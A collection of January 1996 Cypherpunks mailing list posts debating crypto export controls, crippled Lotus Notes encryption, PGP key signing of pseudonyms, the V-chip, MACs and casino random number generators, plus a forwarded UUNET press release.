Content-Type: text/plain


At 13:06 1/24/96, Andrew Loewenstern wrote:

>Why not just print out all of the source code to Navigator (crypto and all)
>in a nice OCR font?  Paper is exportable.  Then you would 'only' have to scan
>it back in and debug it.

That would be giving away the store to the competition.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 26 Jan 1996 23:17:44 +0800
To: cypherpunks@toad.com
Subject: re: [local] Report on Portland Cpunks meeting
Message-ID: <v02120d0cad2cde34e73e@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:33 1/24/96, Jonathan Rochkind wrote:

>If, on the other hand, I sign "Toxic Avenger"'s key, then what benefit is
>this for third parties?  Since Toxic Avenger is, by intention, _not_ linked
>to a real person, I'm not saying that I feel confident that this key really
>belongs to any particular real person.  What am I saying?

What if the nym is linked to a real person? There are nyms on this list
that people here have met in person, talked with on the phone, etc. Say
that person verifies their key fingerprint. Should one sign the key? I have
signed keys of people without seeing their ID, because I and everyone else
I know knows them under the name on the key.

What if I watch someone _generate_ a key under the nym "Master Blaster"? I
know that "Master Blaster" isn't their real name. Does that mean I
shouldn't sign the key?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jan 1996 17:29:34 +0800
To: cypherpunks@toad.com
Subject: Re: V-chip?
Message-ID: <ad2c5eaa04021004bc8a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:33 AM 1/25/96, Mike Duvos wrote:

>As I understand it, the basic concept behind the V-Chip is to
>allow selective blocking of material a particular viewer might
>find offensive based on content information transmitted along
>with the program.  As long as the program material itself is
>transmitted unaltered, and there are multiple non-governmental
>providers of content descriptions catering to the spectrum of
>human likes and dislikes, this sounds like ideal Cypherpunk
>technology.
>
>Concerned Parent can set the V-Chip to read from the Children's
>Television Workshop content service, available for a small
>monthly fee, and be certain that graphic violence and sex are
>pixelated on screen, and that bleep words that the child might
>practice in front of Grandma are garbled.
>
>Mr. Islamic Fanatic can filter out all blasphemy against Allah
>and his one and only prophet, pork commercials, and women showing

The V-chip described heretofore is considerably less nuanced than this,
having only a few states (roughly corresponding to MPAA movie ratings). No
switch settings to block Democrat programs, or Feminist programs, or Mormon
programs. Just your basic "indecency," with "violence" as lagniappe.

And most Cypherpunks would tend to reject it because it is not voluntary
(unless you think "so don't buy a television" is a viable voluntary
choice). It will add to the cost of t.v.s and VCRs, and possibly interfere
with the computer-based options to come.

And it's easily defeatable. For one thing, most households have multiple
t.v.s or VCRs, any one of which without the V-chip will defeat the system.
Also, it is likely that the households "most in need" of this chip--using
the logic about unattended children watching violent programs while their
parents are away--will be the least likely to buy the brand-new sets and
VCRs that have this chip. (I would guess that most families will have
existing sets and VCRs for at least the next decade or more.)



>What are the dangers of this new technology?
>
>First, the government might want only one description of content,
>which it controls.  My notion of what is offensive probably
>differs greatly from that of Jesse Helms, for instance.

This is mostly the case.

My objection to ratings systems imposed by government is a general one. If
video and music is to be rated, why not articles and Usenet posts? The
principle is the same.

Anyone telling me I have to rate my work, or submit it to a ratings agency,
is aggressing against me. Now, if others rate my work (which is already
happening with digest services such as "CP-Lite"), this is their business,
not mine. But the V-Chip precedent is a precedent for the government to
insist that all sorts of content be rated. This should be fought in a free
society.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Thu, 25 Jan 1996 17:49:32 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <v02120d07ad2cd42c8bfb@[192.0.2.1]>
Message-ID: <310738C8.52BF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
>> I would have to remove the des_encrypt() call from the authenticate()
>> routine before it can be exported...
> 
> What if you replaced it by rot_13 ()  ? Surely, they can't ban that. And
> someone later could just swap all rot_13 () for des_encrypt ()

But that's exactly the point: they can ban whatever they like, because
they refuse to tell you the rules.  You show them the code, and they say
"yes" or "no" without sharing with you their reasoning.  And their
reasoning can change at any time, and can be based on any number of
factors which you might consider unfair.

Logic and fairness have no place in this, because "National Security" is
the root password to the Constitution.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 25 Jan 1996 18:03:26 +0800
To: sameer <sameer@c2.org>
Subject: Re: Crippled Notes export encryption
Message-ID: <v02120d1aad2cf0893510@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:11 1/24/96, sameer wrote:
>> example, CyberCash has a development office there.
>>
>        "has a development office" is a bit of an understatement.

Would you like to share?


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 26 Jan 1996 07:36:03 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape & open NNTP servers
Message-ID: <2.2.32.19960125085148.008bea88@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:23 PM 1/24/96 -0800, you wrote:

>  I believe that it will use a SOCKS proxy if configured, but that
>NNTP will not use the HTTP proxy.

I am not certain about 2.x, but the 1.x would read mail through an NNTP
proxy, but not post it.  SOCKS would work, but not for the type of
connection the poster was looking for...  In 1.2 and 1.22, the NNTP proxy
was hidden in the netscape.ini file.  (It was considered "broken" becuase
you could not post to news.)

No good answers...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jan 1996 18:19:04 +0800
To: cypherpunks@toad.com
Subject: Re: Hack Lotus?
Message-ID: <2.2.32.19960125090041.008e7488@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:38 AM 1/25/96 +0000, you wrote:

>I have no doubt that enterprising hackers will be able to hack
>the international version of lotus Notes to make it as secure
>as the domestic version. It is probably just a matter of NOPing
>some code.
>
>The real problem is the 64 bit key in the domestic version. This
>conforms to the NIST "standard" for an exportable system. In other
>words to allow the international people to have almost non-existant
>40 bit security, they have limited domestic users to 64 bit secuity.
>The 64 bits keys must be breakable at least in some sense or the limitation
>would not be in the NIST "standard".
{stuff deleted]

Something just came to mind...  What if there is not difference between the
exportable and non-exportable versions?  Could it be that they are *both* GAKed?

Maybe I am just being paranoid (or thinking that IBM might just be lazy
enough to push out a single version under two versions), but it is something
that needs to be determined.

Does anyone out there have access to both versions for a comparison?

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jan 1996 18:16:47 +0800
To: cypherpunks@toad.com
Subject: [noise] Re: Crippled Notes export encryption
Message-ID: <2.2.32.19960125090719.008efa3c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:24 PM 1/24/96 -0500, you wrote:
>In article <9601242357.AA02688@alpha>, Mike McNally <m5@dev.tivoli.com> wrote:
>>This sounds fishy to me.  I don't recall reading anything to suggest
>>that export of cryptographic software (or any other munition) requires
>>that the stuff be *used* outside the US for an offense to be
>>committed; why should export of a cryptographer's wetware be any
>>different?  Either the expertise leaves the country or it doesn't, I'd
>>think.
>
>Here's section 120.17 of ITAR:
>
>@ 120.17 -- Export.
>
>   Export means:
>
>   (6) A launch vehicle or payload shall not, by reason of the launching of
such
>vehicle, be considered an export for purposes of this subchapter. However, for
>certain limited purposes (see @ 126.1 of this subchapter), the controls of this
>subchapter may apply to any sale, transfer or proposal to sell or transfer
>defense articles or defense services.

So we could launch Jeff Wienstien in a rocket without violating ITAR as long
as we do not sell him.

"Hey Jeff... Want a ride?" ];>

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
               National Security uber alles!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jan 1996 17:28:43 +0800
To: koontz@maspar.com (David G. Koontz)
Subject: Re: NSA advanced knowledge
In-Reply-To: <9601250609.AA28967@argosy.MasPar.COM>
Message-ID: <199601250627.BAA14153@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



David G. Koontz writes:
> >
> >      ... This Hellman-Diffie proposal was apparently
> >      anticipated by a similar version developed by the
> >      National Security Agency (NSA) a decade earlier.
> >      (p. 164)
[...]
> It was originally called FIREFLY or somesuch thing.  I may have some of
> the early papers.  (The same ones leading to the statement in the book).
>  
> This should predate the STU-II to STU-III transition.

I thought that FIREFLY was just the NSA's name for the STS variant
that they use for STU-IIs and STU-IIIs.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@ncr-sd.SanDiegoCA.ATTGIS.COM
Date: Thu, 25 Jan 1996 18:22:34 +0800
Subject: SMTP mail warning
Message-ID: <9601250937.AB19972@toad.com>
MIME-Version: 1.0
Content-Type: message

message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jan 1996 16:22:16 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Why is blowfish so slow? Other fast algorithms?
In-Reply-To: <199601250629.WAA16623@mailx.best.com>
Message-ID: <199601250638.BAA14178@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" writes:
> At 07:32 PM 1/23/96 -0500, David A Wagner wrote:
> 
> >If you want authentication, you must use a crypto-strength MAC.
> >Encryption (be it RC4, DES, etc.) is not enough.
> 
> Not so:  If the message is encrypted and checksummed with a simple
> not non cryptographic checksum, this gives you everything a MAC 
> gives you, plus the message is secret.

Not so. There are unfortunate tricks that can be played here because
some encryptions preserve properties of the underlying text (like
parity) and some checksums can be manipulated because of the same.

I've asked the crypto types for information on simplified faster MACs
for use in authentication protocols for IPSEC and I have yet to get a
straight answer, so for the moment I'm erring on the side of caution, too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Thu, 25 Jan 1996 14:10:56 +0800
To: cypherpunks@toad.com (cypherpunks mailing list)
Subject: Hack Lotus?
Message-ID: <3106df37.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have no doubt that enterprising hackers will be able to hack
the international version of lotus Notes to make it as secure
as the domestic version. It is probably just a matter of NOPing
some code.

The real problem is the 64 bit key in the domestic version. This
conforms to the NIST "standard" for an exportable system. In other
words to allow the international people to have almost non-existant
40 bit security, they have limited domestic users to 64 bit secuity.
The 64 bits keys must be breakable at least in some sense or the limitation
would not be in the NIST "standard".

The 64 bit keys are probably allocated in structures and stack allocations,
so the hacking past the 64 bit limitation will probably be extremely difficult
and error prone! (To increase the size of data in a structure or data on the
stack means moving all the data beond it. This means increasing the memory
allocated and changing all references to data beond the data whose size is 
increased.) To do this in a patch, may be difficult.

In any case, I do not trust the code any large company if I do not have
the source code. Big companies are too subject to presure. What we really
need is a hack to completely substitute our own external code such as PGP!

- -- 
Paul Elliott                                  Telephone: 1-713-781-4543
Paul.Elliott@hrnowl.lonestar.org              Address:   3987 South Gessner #224
                                              Houston Texas 77063

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMQbe8fBUQYbUhJh5AQHDoAQAg9eWu4aJrhQ87n+JqxfTjCOJKEKm8Bfr
J9Gggh/jnzW1MY4ApjOtQes7sHR5+66i43E4nUnN0CJYyD+aMCjbJEhwLPU4uHy2
1nF36X0vCYe0+4uSrebW/eMpFBj6fFrVbrmF8tiGD2VrqSQ2Fda00PY9erKKD2KN
GTmeqFL/QVY=
=SDNt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Thu, 25 Jan 1996 18:37:52 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <v02120d0bad2cdd10a2c8@[192.0.2.1]>
Message-ID: <ML-2.0.822559982.7349.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


> At 13:06 1/24/96, Andrew Loewenstern wrote:
> 
Lucky sez:

> >Why not just print out all of the source code to Navigator (crypto and

> That would be giving away the store to the competition.

Not to mention all those hidden easter eggs.

Err, I think the idea was to "sell" the OCR source to a foreign puppet
company which then pays any royalties it would be responsible for back to
the real McCoy.

Don

<this message espionage-enabled with ROT-00[tm] security>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 07:53:15 +0800
To: cypherpunks@toad.com
Subject: Guilt by Association?
Message-ID: <ad2c816d06021004e749@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:49 AM 1/25/96, Alan Olsen wrote:

>This is a problem with the web of trust in general.  It is known as "Guilt
>by Association".
>
>Person X commits treasonable act A.  All of the persons who are signed on to
>his key could be considered to be co-conspirators.  The same applies to
>nyms.  The difficulty with prosecuting nyms is finding the link to the real
>world individual.  Anyone associated with him/her/it will be considered to
>be guilty by reason of key signage or a way of determining who the real
>person is...
....
>I guess we are stuck with the "Web of Guilt"...

Although I disagree with many things the U.S. government has declared
unlawful, and think we are on the wrong track in many ways, I don't see any
evidence for a "web of guilt."

I could have signed the keys of Timothy McVeigh, O.J. Simpson, and Hilary
Clinton, and yet this would not cause any prosecutor to indict me, per se.
(Brian Davis, do you disagree?) Obviously if one of these persons I was
known to have associated with, to the point of signing their keys, were
under investigation, then some detectives might follow up some leads to
find out who I was. This is ordinary detective work, not guilt by
association.

Key-signing is overrated, in my view. It is just an affidavit from someone
that they think a person is related to a key. I've signed a few keys (not
many, and don't ask me to!), and I've never once asked for any form of
state-sanctioned ID.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jan 1996 18:13:13 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
Message-ID: <ad2c8470070210049c6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:25 AM 1/25/96, Lucky Green wrote:

>The big companies are fighting? Where did you get that idea? IBM/Lotus just
>gave the feds the keys. Not a single one of the major players has
>challenged the government in any meaningful way. Sure, they make a lot of
>noise as to how they dislike the regulations, but they certainly aren't
>making a sincere effort of trying to change them.

I have several pieces of evidence which suggest to me that the government
is leaning on companies in ways which are not always apparent. (I can't
share all of the evidence I have...I know this is unsatisfying. I'm not
asking you to "trust me," just noting that this is what I have either heard
from usually reliable sources or from direct participants.)

I am reluctant to ascribe malice to any of the players in this drama, just
differing goals (in the Great Game).

--Tim

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Decius <decius@montag33.residence.gatech.edu>
Date: Thu, 25 Jan 1996 17:37:18 +0800
To: fair@clock.org (Erik E. Fair)
Subject: Re: another thought about random numbers
In-Reply-To: <v02110102ad2c27f6b0fb@[198.68.110.19]>
Message-ID: <199601250752.CAA06216@montag33.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> 
> While musing over a roulette table, and noticing the preponderence of
> electronic games in the various Casinos in Stateline, NV, a thought
> occurred: does anyone know what sorts of random number generators those
> electronic games use, and how (if at all) they are measured and regulated
> by the Nevada Gaming Commission? They might have something to teach us.
hmmm... probably just a cheapo pseudo-rng....
With a copy of their squematics and a whole lot of analysis you could 
probably make some serious money!! :)

-- 
        */^\*  Tom Cross AKA Decius 615 AKA The White Ninja  */^\* 
                    Decius@montag33.residence.gatech.edu

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzA6oXIAAAEEAJ6ZWl7AwF9rDZhREQ2b9aPxJKL7dxQNx6QQ0pB5o9olvNtG
tIjA47KxWmZAx47m2JEWRgAIaiDHx00dEza5GX4FuFHL7wSXW7qOtqj7CmVLEg4e
0F/Mx0z7Q/aNsn34JrZUWbMLKkAOOB9sJARRynPRVNokAS30ampImlrLbQDFAAUT
tCZEZWNpdXMgNmk1IDxkZWNpdXNAbmluamEudGVjaHdvb2Qub3JnPg==
=0qgN
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pete@stc.com (Pete Wenzel)
Date: Thu, 25 Jan 1996 14:16:07 +0800
To: mlist-cypherpunks@stc.com
Subject: Re: Associating Local Port Number to PID
In-Reply-To: <mlist.cypherpunks.2.2.32.19960124164913.006a5fa0@cosmos.cosmos.att.com>
Message-ID: <4e6t2t$h2f@loki.stc.com>
MIME-Version: 1.0
Content-Type: text/plain


"Karl A. Siil" <karl@cosmos.cosmos.att.com> writes:

> I'm working on a program for UNIX (SVR4, Solaris 2.4) systems that needs to
> associate PID with local TCP/IP port number, so as to pass session keys
> accordingly to already running processes. This sounds like such an obviously
> needed association that someone must have done it already.

Take a look at how implementations of identd (RFC 1413) do it.  This daemon
associates a TCP port with its UID, but I'm sure the PID is very close by
in the netstat data structures.  It might actually find the PID first, then
look up its owner's UID.

Anyway, look at the pidentd stuff at ftp://ftp.lysator.liu.se/pub/ident/.

--Pete
 ======= Pete Wenzel === Senior Member, Technical Staff and DNRC =======
 == Software Technologies Corp.,  P. O. Box 661090, Arcadia, CA 91066 ==
 == Phone: 818-445-7000 x311 = http://www.stc.com = FAX: 818-447-0879 ==
http://PGP.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=pete@stc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Thu, 25 Jan 1996 19:20:08 +0800
To: cypherpunks@toad.com
Subject: another thought about random numbers
Message-ID: <199601251055.FAA25587@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Decius writes:
> hmmm... probably just a cheapo pseudo-rng....

I'm sure you're right.

> With a copy of their squematics and a whole lot of analysis you could
> probably make some serious money!! :)

Perhaps, but only to the extent that you could win what others have lost.
These machines only ever pay out a percentage of what is put in - it is
not possible to beat the machine (long gone are the days when the designers
calculated all the probablities and relied on "the law of averages" in
order for the machine to win).

Gary

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMQdhoioZzwIn1bdtAQHk6AF/foseD0Wg3ezlf7XIHPkkwYcYz7OuQdQH
mxyFFcFYxU6TLxjdn/FG8s1ehtegfqQD
=LtQC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 25 Jan 1996 17:51:51 +0800
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <v02110102ad2c27f6b0fb@[198.68.110.19]>
Message-ID: <199601250725.IAA02599@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


fair@clock.org ("Erik E. Fair"  (Time Keeper)) writes:
>does anyone know what sorts of random number generators those
>electronic games use, and how (if at all) they are measured and regulated
>by the Nevada Gaming Commission? They might have something to teach us.

There was some conversation about this recently on rec.gambling.other-games. 
Several people who work in the industry said that electronic machines
use some sort of PRNG, but with a nice added bit of random input - the
player's timing of hitting the buttons. One poster described it as the
machine constantly generating numbers, and choosing the payoff based
on the last number generated when the user hit a button.

I think that'd work pretty well. It's nice that this is in a slot
machine: typical computers can't afford to waste lots of time
throwing away random numbers.

There was also some speculation about whether the machines were immune
to electronic tampering.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Jan 1996 02:14:18 +0800
To: "j. ercole" <joee@li.net>
Subject: Re: mouse droppings
In-Reply-To: <v01510100ad2c1f92daae@[199.173.75.117]>
Message-ID: <Pine.SOL.3.91.960125081926.1217A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jan 1996, j. ercole wrote:

> In the march '96 issue of macworld there's a "Viewpoint" reporting on the
> progress of the info superhighway.  Privacy and security issues predominate
> the text, the primary source of which is larry irving --- "a top
> administration adviser on telecommunications."

Larry Irving is a deputy secretary at the Commerce Department, and heads 
up the NTIA and NII initiatives. He has a strong  civil rights 
background, and actually uses the net rather than just having some aide 
send him some clippings. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 25 Jan 1996 21:55:27 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
In-Reply-To: <Pine.SUN.3.91.960124225704.5620D-100000@viper.law.miami.edu>
Message-ID: <199601251332.IAA03055@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


froomkin@law.miami.edu:

> No, the real threats to LEAs/traditional ways of doing things are more
> likely to be anonymity and anonymous cash.  And these are things that may
> well be within the power of governments to at least make difficult if not
> eliminate for some time.  "Chokepoints" is indeed the key word here, with
> banks and remailer operators as chokees. 

But look at the recent NYT story re: Russian banks....
(The Fed even supplies the greenbacks.....)


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an146908@anon.penet.fi
Date: Thu, 25 Jan 1996 18:11:44 +0800
To: cypherpunks@toad.com
Subject: (FWD) UUNET Offers Web Security Services 01/22/96
Message-ID: <9601250846.AA23528@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


  	  	
FAIRFAX, VIRGINIA, U.S.A., 1996 JAN 22 (NB) -- UUNET Technologies 
(Nasdaq:UUNT) is offering a World Wide Web hosting service that 
includes a full range of security services for commercial and 
private applications, including use of PGP (pretty good privacy) 
encryption.  

The company says the introduction of secure Web services 
supports served-based SSL (secure socket level) encryption that 
works with Netscape browsers to transmit sensitive data such as 
credit card numbers.  

The inclusion of PGP also allows companies to encrypt and 
forward data they have received on the Web, which can then be 
redistributed to other system, such as credit bard billing 
systems, via e-mail or FTP (File Transfer Protocol).  

UUNET says the combination of security measures is available for 
UUNET's standard, premium, and new dedicated Web hosting services.  

Alan Taffel, UUNET vice president of marketing, said the new 
measures are "a significant step toward the goal of making 
Web-based electronic commerce a reality. Previously, companies 
wishing to take advantage of available secure server technology 
had to undertake a challenging and lengthy process. UUNET's 
secure Web service alleviates the hassle associated with 
deploying a secure server."  

Customers choosing the secure service will get the same Internet 
service as regular customers, says UUNET. Also, UUNET will take 
care of details such as applying to Verisign for a company 
digital identification.  

UUNET is also now offering a dedicated server option for high 
volume and high value customers. This service includes a dedicated 
130 megahertz (MHz) Pentium machine, a gigabyte (GB) of storage and 
up to 5GB of traffic per month. The price involves a $3,500 startup 
fee, and monthly fees beginning at $2,000 per month.  

UUNET's standard service starts at $300 a month and includes T1 
bandwidth. Premium service (10 megabits-per-second  connectivity) 
starts at $900 per month. For standard service, the security service 
cost an additional $200 in startup fees and $200 per month above the 
normal fee. There is no startup fee for premium service, but the 
monthly surcharge remains.  

FTP hosting service is available for $100 per month for up to 
2.5GB per month in traffic.  

(Kennedy Maize/19960122/Press Contact: Alan Taffell, 
703-206-5600)  
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 26 Jan 1996 02:39:34 +0800
To: John Young <jya@pipeline.com>
Subject: Re: TOP_tap
In-Reply-To: <199601251559.KAA02710@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.960125085748.1217B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, John Young wrote:
> 
>    "Military Men Named to Top Intelligence Posts."
> 
>       AF Gen. Kenneth Minihan to run all US eavesdropping on
>       foreign governments and citizens at NSA, which is

Here's an embarassing question to show my ignorance - I thought the NSA 
was a Military organisation. Is it under the Pentagon, State, or is it a 
separate part of the executive? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Thu, 25 Jan 1996 23:49:46 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <3106A21E.33E3@netscape.com>
Message-ID: <199601251504.JAA04039@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

>> Didn't Netscape already promise to remove the hooks? It seems to me all of
>> the major software players are already in bed with the government.
>
>  What do you mean by "promise to remove the hooks"?

I mean they planned to have some type of crypto, but then after a visit
from the USG, they removed that plan, and even withdrew the interface so
that someone else couldn't "drop in" the crypto. The press release
describing it was within the past 12 months or so. I will find it
eventually.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: olbon@dynetics.com (Clay Olbon II)
Date: Thu, 25 Jan 1996 22:35:50 +0800
To: warlord@MIT.EDU>
Subject: Re: Crippled Notes export encryption
Message-ID: <v01540b00ad2d38fd6378@[193.239.225.200]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 1/24/96, Lucky Green wrote:
>At 19:34 1/24/96, Derek Atkins wrote:
>>If I have a function that does something like this:
>>
>>authenticate (args)
>>{
>>        ...
>>
>>        des_encrypt ();
>>        ...
>>}
>>
>>I would have to remove the des_encrypt() call from the authenticate()
>>routine before it can be exported...
>
>What if you replaced it by rot_13 ()  ? Surely, they can't ban that. And
>someone later could just swap all rot_13 () for des_encrypt ()
>
>
>-- Lucky Green <mailto:shamrock@netcom.com>
>   PGP encrypted mail preferred.

Better idea: replace des_encrypt() with fuck_the_itar().

Seriously, this just illustrates the idiocy of banning "hooks" in software.
How does one define a "hook"?  Just providing source code could be defined
as providing a hook, since a good programmer could then modify it to do
crypto.  Also, how about the various kits and tools used to integrate pgp
with pine, eudora, etc -- are these not "hooks"?

        Clay

---------------------------------------------------------------------------
Clay Olbon II            | olbon@dynetics.com
Systems Engineer         | ph: (810) 589-9930 fax 9934
Dynetics, Inc., Ste 302  | http://www.msen.com/~olbon/olbon.html
550 Stephenson Hwy       | PGP262 public key: finger olbon@mgr.dynetics.com
Troy, MI 48083-1109      | pgp print: B97397AD50233C77523FD058BD1BB7C0
    "To escape the evil curse, you must quote a bible verse; thou
     shalt not ... Doooh" - Homer (Simpson, not the other one)
---------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Tighe <tighe@spectrum.titan.com>
Date: Fri, 26 Jan 1996 00:30:50 +0800
To: jeffb@sware.com (Jeff Barber)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601251555.KAA01850@jafar.sware.com>
Message-ID: <199601251530.JAA04672@softserv.tcst.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Barber writes:

>> Didn't Netscape already promise to remove the hooks? It seems to me all of
>> the major software players are already in bed with the government.

>I think you may be confused.  I do recall a report that some NSA folks
>visited NCSA and recommended they remove crypto hooks from the NCSA httpd.
